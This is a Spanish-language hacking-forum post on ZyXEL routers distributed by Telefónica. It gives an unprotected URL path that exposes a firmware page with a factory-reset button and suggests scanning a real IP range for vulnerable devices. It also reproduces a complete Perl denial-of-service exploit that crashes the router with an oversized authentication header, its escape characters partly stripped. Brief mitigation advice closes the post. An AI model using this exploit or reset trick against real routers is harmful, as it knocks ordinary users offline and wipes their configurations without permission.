Buenas gente de este foro; publico un texto que es de mi autoria; que publique en el nuevo grupo de hack en el que soy mienbro. Espero que sea de su agrado; es sobre un tema en el que he estado investigando en estos ultimos dias…aqui va:

Se trata en conocer las vulnerabilidades de los routers zyxel, modelos 623,652 y 650HW, del fabricante ZyXEL; sabemos que estos routers lo distribuye la Telefonica generalmente. 

Aunque estos bugs tienen su tiempo ya : ) la gente todavia no se percata del problema; esto se puede verificar escaneando pcs de por ejemplo entre los rangos de ips 80.24.xxx.xxx.   

Bien presento, los bugs mencionados:

1.- Vulnerabilidad en el control remoto que permite resetear el router:

Como todos sabemos, la mayoria de routers se pueden configurar via telnet (23) o via http (80); bien se ha descubierto este bug en la configuracion via web; si escribimos en la barra de direccion de cualquier explorador:


Código:

http://[ipdelrouter] /rPFWUpload.html
Entraremos a la pantalla de configuracion del router en que permite actualizar el firmware; sección que esta desprotegida de password alguna. Si observamos con mas atencion veremos un boton que permite el reseteo completo del router, osea a su configuracion inicial.

Cabe resaltar que esto es posible en cualquier modelo; y funciona si esta activada la configuracion remota (cosa que viene por defecto)

2.- Vulnerabilidad en ZyXEL Prestige 650HW, 650R-11 es afectado por una ataque DoS

Se trata de un bug que permite un DoS; al introducir una larga longitud de caracteres como password; para este agujero existe un exploit creado por frid4y: 


Código:

#!/usr/bin/perl
#
# ZyXEL Prestige 650HW-31 and 650R-11 DSL Router
# Running RomPager 4.07 server
# Remote long password DoS exploit
#
# by frid4y ftff[at]c.dk
#

use IO::Socket;

print "n ZyXEL Prestige 650HW-31/650R-11 DSL Router remote DoS exploitn";
print " k0ded by frid4y ftff[at]c.dknn";

$target = $ARGV[0];
$port = $ARGV[1];
$foo = "shite"; $bar = "1337";
$packet = $foo x $bar;
$string = "GET / HTTP/1.1rnHOST: $targetrnAuthenticate: $packetrnrn";

unless (@ARGV == 2) { die " Usage: $0 <target> <port>nn" }
@ARGV = ($target, $port);

$conn = IO::Socket::INET->new(

      Proto      =>   "tcp",
      PeerAddr   =>   "$target",
      PeerPort   =>   "$port",
   );

unless ($conn) { die " [-] Can’t connect to targetnn" }
   else {
      print $conn $string;
      print "

• Package delivered to $ARGV[0]nn"

   }

close($conn);

La Solucion para los que usan estos router es primero: desabilitar la configuracion remota y segundo: actualizar el firmware. Para mas informacion visiten los siguientes links:

http://www.adslayuda.com